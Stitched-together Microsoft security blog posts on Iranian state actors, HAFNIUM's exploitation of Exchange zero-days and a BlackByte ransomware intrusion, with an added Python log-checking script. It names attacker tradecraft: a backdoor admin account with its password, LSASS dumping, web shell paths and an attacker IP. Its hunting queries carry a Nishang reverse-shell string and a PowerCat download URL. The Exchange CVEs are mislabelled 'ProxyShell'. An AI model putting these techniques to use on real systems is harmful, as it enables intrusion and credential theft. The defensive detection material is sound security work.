In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).

### Exploit

When they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.

### Review

After gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were fitting for actions on objectives. On select victims, operators created local administrator accounts with a username of “help” and password of “_AS_@1394” via the commands below. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.

### Stage and Ransom

Finally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems.
Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.

## Patience and persistence

MSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator’s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.

### PHOSPHORUS – Patient and persistent

PHOSPHORUS sends “interview requests” to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.

Once the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link.
The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.

MSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.

### CURIUM – In it for the long run

CURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.

These attackers have followed this playbook:

 * Masquerade as an attractive woman on social media
 * Establish a connection via social media with a target user via LinkedIn, Facebook, etc.
 * Chat with the target daily
 * Send benign videos of the woman to the target to prime them to lower their guard
 * Send malicious files to the target similar to the benign files previously sent
 * Request that the target user open the malicious document
 * Exfiltrate data from the victim machine

The process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications, which allows them to build trust and confidence with the target. In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.

By exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.

## Brute force

In 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks.
DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).

Analysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.

Targeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.

As we discussed in our previous blog, DEV-0343 operators’ ‘pattern of life’ is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.

_Figure 2: DEV-0343 observed operating hours in UTC_

_Figure 3: DEV-0343 observed actor requests per day_

Known DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day.
MSTIC assesses that these observed overlapping activities suggest coordination between different Iranian actors pursuing common objectives.

## Closing thoughts: Increasingly capable threat actors

As Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:

 * Information operations
 * Disruption and destruction
 * Support to physical operations

Specifically, Iranian operators have proven themselves to be both willing and able to:

 * Deploy ransomware
 * Deploy disk wipers
 * Deploy mobile malware
 * Conduct phishing attacks
 * Conduct password spray attacks
 * Conduct mass exploitation attacks
 * Conduct supply chain attacks
 * Cloak C2 communications behind legitimate cloud services

MSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.

The post [Evolving trends in Iranian threat actor activity – MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).

_Record metadata: published 2021-11-16; feed id MMPC:C0F4687B18D53FB9596AD4FDF77092D8; related CVEs: CVE-2018-13379, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065; CVSS v3.1 base score 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 base score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)._

---

_**Update [03/08/2021]**: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with on-premises Exchange Server. To aid defenders in investigating these attacks where Microsoft security products and tooling may not be deployed, we are releasing a feed of observed indicators of compromise (IOCs). The feed of malware hashes and known malicious file paths observed in related attacks is available in both JSON and CSV formats at the below GitHub links.
This information is being shared as TLP:WHITE._

 * [CSV format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>)
 * [JSON format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>)

_**Update [03/05/2021]**: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM. To aid customers in investigating these attacks, Microsoft Security Response Center (MSRC) has provided additional resources, including new mitigation guidance: [Microsoft Exchange Server Vulnerabilities Mitigations – March 2021](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>)_

_**Update [03/04/2021]**: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise._

Microsoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments.
Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to [HAFNIUM](<https://blogs.microsoft.com/on-the-issues/?p=64505>), a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.

The vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today’s [Microsoft Security Response Center (MSRC) release - Multiple Security Updates Released for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.

We are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) advanced hunting queries, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.

Microsoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also [published a blog post](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities>) with their analysis.
It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.

## Who is HAFNIUM?

HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.

HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like [Covenant](<https://github.com/cobbr/Covenant>), for command and control. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like [MEGA](<https://mega.nz/>).

In campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets’ environments.

HAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.

## Technical details

Microsoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.

[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.

[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program.
Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.

[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

## Attack details

After exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise.
One example of a web shell deployed by HAFNIUM, written in ASP, is below:

Following web shell deployment, HAFNIUM operators performed the following post-exploitation activity:

 * Using Procdump to dump the LSASS process memory:
 * Using 7-Zip to compress stolen data into ZIP files for exfiltration:
 * Adding and using Exchange PowerShell snap-ins to export mailbox data:
 * Using the [Nishang](<https://github.com/samratashok/nishang>) Invoke-PowerShellTcpOneLine reverse shell:
 * Downloading PowerCat from GitHub, then using it to open a connection to a remote server:

HAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.

Our blog, [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>), offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog [Web shell attacks continue to rise.](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>)

## Can I determine if I have been compromised by this activity?

The below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender.
We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.

### Check patch levels of Exchange Server

The Microsoft Exchange Server team has published a [blog post on these new Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and to answer some basic questions around installation of these patches.

### Scan Exchange log files for indicators of compromise

The Exchange Server team has created a script that runs a check for HAFNIUM IOCs and addresses the performance and memory concerns of the manual commands below. That script is available here: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.

 * CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs:
   * These logs are located in the following directory: `%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\HttpProxy`
   * Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern `ServerInfo~*/*`
   * Here is an example PowerShell command to find these log entries:

`Import-Csv -Path (Get-ChildItem -Recurse -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\HttpProxy" -Filter '*.log').FullName | Where-Object { $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'} | select DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent`

   * If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions
were taken.
   * These logs are located in the `%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging` directory.
 * CVE-2021-26858 exploitation can be detected via the Exchange log files:
   * `C:\Program Files\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog`
   * Files should only be downloaded to the `%PROGRAMFILES%\Microsoft\Exchange Server\V15\ClientAccess\OAB\Temp` directory
   * In case of exploitation, files are downloaded to other directories (UNC or local paths)
   * Windows command to search for potential exploitation:

`findstr /snip /c:"Download failed and temporary file" "%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog\*.log"`

 * CVE-2021-26857 exploitation can be detected via the Windows Application event logs
   * Exploitation of this deserialization bug will create Application events with the following properties:
     * Source: MSExchange Unified Messaging
     * EntryType: Error
     * Event Message Contains: System.InvalidCastException
   * Following is a PowerShell command to query the Application Event Log for these log entries:

`Get-EventLog -LogName Application -Source "MSExchange Unified Messaging" -EntryType Error | Where-Object { $_.Message -like "*System.InvalidCastException*" }`

 * CVE-2021-27065 exploitation can be detected via the following Exchange log files:
   * `C:\Program Files\Microsoft\Exchange Server\V15\Logging\ECP\Server`
   * All `Set-<AppName>VirtualDirectory` properties should never contain script. InternalUrl and ExternalUrl should only be valid URIs.
   * Following is a PowerShell command to search for _potential_ exploitation:

`Select-String -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\ECP\Server\*.log" -Pattern 'Set-.+VirtualDirectory'`

## Host IOCs

Microsoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks.
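Before the feed itself, the three log checks from the preceding section (HttpProxy, OABGeneratorLog and ECP\Server) as an added Python example. This is not Microsoft's code; the log formats below are simplified and the sample lines are constructed, so in practice the inputs would be the files under the Logging directory named above, and real HttpProxy logs carry a few `#`-prefixed preamble lines that must be skipped before the CSV header.

```python
r"""Added example (not Microsoft's code): the three Exchange log checks from
the section above, run over constructed sample lines.  In production the
inputs would be the files under %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging;
everything below, including the simplified log formats, is made up."""
import csv
import fnmatch
import io
import re
from urllib.parse import urlsplit

# --- 1. HttpProxy logs (CVE-2021-26855 SSRF) ---------------------------------
# Constructed sample with a plain CSV header row.  Real HttpProxy logs begin
# with '#'-prefixed preamble lines that would need to be skipped first.
HTTPPROXY_LOG = r"""DateTime,AuthenticatedUser,AnchorMailbox,UrlStem,BackEndCookie,HttpStatus
2021-03-01T10:00:00.000Z,contoso\alice,alice@contoso.com,/owa/,Server~EX01~1,200
2021-03-01T10:00:05.000Z,,ServerInfo~EX01/mapi/emsmdb/?#,/ecp/y.js,,200
2021-03-01T10:00:07.000Z,,,/owa/auth/logon.aspx,Server~EX01/ecp/~200,200
"""


def find_ssrf_proxy_entries(csv_text):
    """Rows with an empty AuthenticatedUser whose AnchorMailbox looks like
    ServerInfo~*/* (the rule stated in the post), or whose BackEndCookie looks
    like Server~*/*~* (the second -like test in the post's PowerShell)."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        user = (row.get("AuthenticatedUser") or "").strip()
        anchor = (row.get("AnchorMailbox") or "").lower()   # -like is case-insensitive
        cookie = (row.get("BackEndCookie") or "").lower()
        if user == "" and fnmatch.fnmatchcase(anchor, "serverinfo~*/*"):
            hits.append((row["DateTime"], "anchor", row["AnchorMailbox"]))
        elif fnmatch.fnmatchcase(cookie, "server~*/*~*"):
            hits.append((row["DateTime"], "cookie", row["BackEndCookie"]))
    return hits


# --- 2. OABGeneratorLog (CVE-2021-26858 arbitrary file write) ----------------
OAB_TEMP_DIR = r"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\OAB\Temp"
OAB_PHRASE = "Download failed and temporary file"
OAB_LOG = r"""
2021-03-01T10:01:00.000Z,Download failed and temporary file C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\OAB\Temp\4b3f.lzx
2021-03-01T10:01:30.000Z,Download failed and temporary file C:\inetpub\wwwroot\aspnet_client\errorEE.aspx
2021-03-01T10:02:00.000Z,Download failed and temporary file \\10.0.0.5\share\x.aspx
"""


def find_oab_writes_outside_temp(log_text, allowed_dir=OAB_TEMP_DIR):
    """The post's findstr check plus the rule beside it: the temporary file must
    sit under the OAB Temp directory; any other local or UNC path is reported.
    In this constructed format the path is the text after the phrase."""
    allowed = allowed_dir.rstrip("\\").lower() + "\\"
    hits = []
    for line in log_text.splitlines():
        idx = line.find(OAB_PHRASE)
        if idx < 0:
            continue
        path = line[idx + len(OAB_PHRASE):].strip().strip('"')
        if not path.lower().startswith(allowed):
            hits.append(path)
    return hits


# --- 3. ECP Server logs (CVE-2021-27065 via Set-*VirtualDirectory) -----------
ECP_LOG = r"""
2021-03-01T10:03:00.000Z,admin@contoso.com,Set-OwaVirtualDirectory -Identity "EX01\owa (Default Web Site)" -ExternalUrl "https://mail.contoso.com/owa"
2021-03-01T10:03:10.000Z,,Set-OabVirtualDirectory -Identity "EX01\OAB (Default Web Site)" -ExternalUrl "http://o/<script>"
2021-03-01T10:03:20.000Z,admin@contoso.com,Get-OabVirtualDirectory
"""
VDIR_CMD = re.compile(r"Set-\w+VirtualDirectory")  # the post greps 'Set-.+VirtualDirectory'
URL_PARAM = re.compile(r'-(InternalUrl|ExternalUrl)\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def url_is_plain(value):
    """True only for a bare http(s) URL with a host and no markup, quote or
    whitespace characters: the sense in which InternalUrl/ExternalUrl must be
    'valid URIs' and must never contain script."""
    if any(ch in value for ch in "<>\"' \t;"):
        return False
    parts = urlsplit(value)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def find_vdir_script_injection(log_text):
    """Set-*VirtualDirectory invocations whose InternalUrl/ExternalUrl is not a plain URL."""
    hits = []
    for line in log_text.splitlines():
        if not VDIR_CMD.search(line):
            continue
        for m in URL_PARAM.finditer(line):
            value = m.group(2) if m.group(2) is not None else m.group(3)
            if not url_is_plain(value):
                hits.append((m.group(1), value))
    return hits


def run_all():
    """Run the three checks over the constructed samples."""
    return {
        "httpproxy": find_ssrf_proxy_entries(HTTPPROXY_LOG),
        "oab": find_oab_writes_outside_temp(OAB_LOG),
        "ecp": find_vdir_script_injection(ECP_LOG),
    }


if __name__ == "__main__":
    for check, hits in run_all().items():
        print(f"{check}: {len(hits)} suspicious entries")
        for hit in hits:
            print("   ", hit)
```

The PowerShell `-like` wildcards map directly onto `fnmatch`. Note that the post's one-liner does not test `AuthenticatedUser` at all, so the first function applies the stricter prose rule (empty user plus the AnchorMailbox pattern) and keeps the command's BackEndCookie pattern as a separate, independent reason; the OAB check reports both local and UNC paths outside the Temp directory, which is the distinction the post draws.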
This feed is available in both [CSV](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>) and [JSON](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>) formats. This information is being shared as TLP:WHITE.

### Hashes

Web shell hashes:

 * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0
 * 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e
 * 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1
 * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5
 * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1
 * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea
 * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d
 * 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944

### Paths

We observed web shells in the following paths:

 * `C:\inetpub\wwwroot\aspnet_client\`
 * `C:\inetpub\wwwroot\aspnet_client\system_web\`
 * In Microsoft Exchange Server installation paths such as:
   * `%PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\`
   * `C:\Exchange\FrontEnd\HttpProxy\owa\auth\`

The web shells we detected had the following file names:

 * `web.aspx`
 * `help.aspx`
 * `document.aspx`
 * `errorEE.aspx`
 * `errorEEE.aspx`
 * `errorEW.aspx`
 * `errorFF.aspx`
 * `healthcheck.aspx`
 * `aspnet_www.aspx`
 * `aspnet_client.aspx`
 * `xx.aspx`
 * `shell.aspx`
 * `aspnet_iisstart.aspx`
 * `one.aspx`

Check for suspicious .zip, .rar, and .7z files in `C:\ProgramData\`, which may indicate possible data exfiltration.

Customers should monitor these paths for LSASS dumps:

 * `C:\windows\temp\`
 * `C:\root\`

### Tools

 * [Procdump](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>)
 * [Nishang](<https://github.com/samratashok/nishang>)
 * [PowerCat](<https://github.com/besimorhino/powercat>)

Many of the following detections are for post-breach techniques used by HAFNIUM. So while these help detect some of the specific current attacks that Microsoft has observed, it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 and CVE-2021-26858.

## Microsoft Defender Antivirus detections

Please note that some of these detections are generic detections and not unique to this campaign or these exploits.

 * Exploit:Script/Exmann.A!dha
 * Behavior:Win32/Exmann.A
 * Backdoor:ASP/SecChecker.A
 * Backdoor:JS/Webshell _(not unique)_
 * Trojan:JS/Chopper!dha _(not unique)_
 * Behavior:Win32/DumpLsass.A!attk _(not unique)_
 * Backdoor:HTML/TwoFaceVar.B _(not unique)_

## Microsoft Defender for Endpoint detections

 * Suspicious Exchange UM process creation
 * Suspicious Exchange UM file creation
 * Possible web shell installation _(not unique)_
 * Process memory dump _(not unique)_

## Azure Sentinel detections

 * [HAFNIUM Suspicious Exchange Request](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/HAFNIUMSuspiciousExchangeRequestPattern.yaml>)
 * [HAFNIUM UM Service writing suspicious file](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml>)
 * [HAFNIUM New UM Service Child Process](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMNewUMServiceChildProcess.yaml>)
 * [HAFNIUM Suspicious UM Service Errors](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMSuspiciousIMServiceError.yaml>)
 * [HAFNIUM Suspicious File 
Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/htttp_proxy_oab_CL/HAFNIUMSuspiciousFileDownloads.yaml>)

## Advanced hunting queries

To locate possible exploitation activity related to the contents of this blog, you can run the following [advanced hunting](<https://securitycenter.windows.com/hunting>) queries via Microsoft Defender for Endpoint and Azure Sentinel:

### Microsoft Defender for Endpoint advanced hunting queries

Microsoft 365 Defender customers can find related hunting queries below or at this GitHub location: <https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/>

Additional queries and information are available via the [Threat Analytics portal](<https://securitycenter.windows.com/threatanalytics3/>) for Microsoft Defender customers.

**UMWorkerProcess.exe in Exchange creating abnormal content**

Look for Microsoft Exchange Server’s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of the CVE-2021-26858 vulnerability:

`DeviceFileEvents | where InitiatingProcessFileName == "UMWorkerProcess.exe" | where FileName != "CacheCleanup.bin" | where FileName !endswith ".txt" | where FileName !endswith ".LOG" | where FileName !endswith ".cfg" | where FileName != "cleanup.bin"`

**UMWorkerProcess.exe spawning**

Look for Microsoft Exchange Server’s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of the CVE-2021-26857 vulnerability:

`DeviceProcessEvents | where InitiatingProcessFileName == "UMWorkerProcess.exe" | where FileName != "wermgr.exe" | where FileName != "WerFault.exe"`

Please note that excessive spawning of wermgr.exe and WerFault.exe could be an indicator of compromise, due to the service crashing during deserialization.

### Azure Sentinel advanced hunting queries

Azure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location: <https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/>.

Look for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:

`SecurityEvent | where EventID == 4688 | where Process has_any ("powershell.exe", "PowerShell_ISE.exe") | where CommandLine has "$client = New-Object System.Net.Sockets.TCPClient"`

Look for downloads of PowerCat in cmd and PowerShell command line logging in Windows Event Logs:

`SecurityEvent | where EventID == 4688 | where Process has_any ("cmd.exe", "powershell.exe", "PowerShell_ISE.exe") | where CommandLine has "https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1"`

Look for the Exchange PowerShell Snapin being loaded. This can be used to export mailbox data; subsequent command lines should be inspected to verify usage:

`SecurityEvent | where EventID == 4688 | where Process has_any ("cmd.exe", "powershell.exe", "PowerShell_ISE.exe") | where isnotempty(CommandLine) | where CommandLine contains "Add-PSSnapin Microsoft.Exchange.Powershell.Snapin" | summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine`

The post [HAFNIUM targeting Exchange Servers with 0-day exploits](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) appeared first on Microsoft Security.

Published 2021-03-02. CVEs: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065. CVSS v3.1 base score 9.8 (Critical), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H; CVSS v2 base score 7.5 (High), vector AV:N/AC:L/Au:N/C:P/I:P/A:P.

_The following is a separate Microsoft Incident Response post on a BlackByte 2.0 ransomware intrusion (record last seen 2023-07-18)._

As ransomware attacks continue to grow in number and sophistication, threat actors can quickly impact business operations if organizations are not well prepared. In a recent investigation by Microsoft Incident Response (previously known as Microsoft Detection and Response Team, DART) of an intrusion, we found that the threat actor progressed through the full attack chain, from initial access to impact, in less than five days, causing significant business disruption for the victim organization.

Our investigation found that within those five days, the threat actor employed a range of tools and techniques, culminating in the deployment of BlackByte 2.0 ransomware, to achieve their objectives.
These techniques included:

 * Exploitation of unpatched internet-exposed Microsoft Exchange Servers
 * Web shell deployment facilitating remote access
 * Use of living-off-the-land tools for persistence and reconnaissance
 * Deployment of Cobalt Strike beacons for command and control (C2)
 * Process hollowing and the use of vulnerable drivers for defense evasion
 * Deployment of custom-developed backdoors to facilitate persistence
 * Deployment of a custom-developed data collection and exfiltration tool

Figure 1. BlackByte 2.0 ransomware attack chain

In this blog, we share details of our investigation into the end-to-end attack chain, exposing security weaknesses that the threat actor exploited to advance their attack. As we learned from Microsoft’s tracking of ransomware attacks and the [cybercriminal economy](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) that enables them, disrupting common attack patterns could stop many of the attacker activities that precede ransomware deployment. This case highlights that common security hygiene practices go a long way in preventing, identifying, and responding to malicious activity as early as possible to mitigate the impact of ransomware attacks. We encourage organizations to follow the outlined mitigation steps, including ensuring that internet-facing assets are up to date and configured securely. We also share indicators of compromise, detection details, and hunting guidance to help organizations identify and respond to these attacks in their environments.

## Forensic analysis

### Initial access and privilege escalation

To obtain initial access into the victim’s environment, the threat actor was observed exploiting the [ProxyShell vulnerabilities](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 on unpatched Microsoft Exchange Servers. The exploitation of these vulnerabilities allowed the threat actor to:

 * Attain system-level privileges on the compromised Exchange host
 * Enumerate the LegacyDN of users by sending Autodiscover requests, including SIDs of users
 * Construct a valid authentication token and use it against the Exchange PowerShell backend
 * Impersonate domain admin users and create a web shell by using the `New-MailboxExportRequest` cmdlet
 * Create web shells to obtain remote control on affected servers

The threat actor was observed operating from the following IP to exploit ProxyShell and access the web shell:

 * 185.225.73[.]244

### Persistence

**Backdoor**

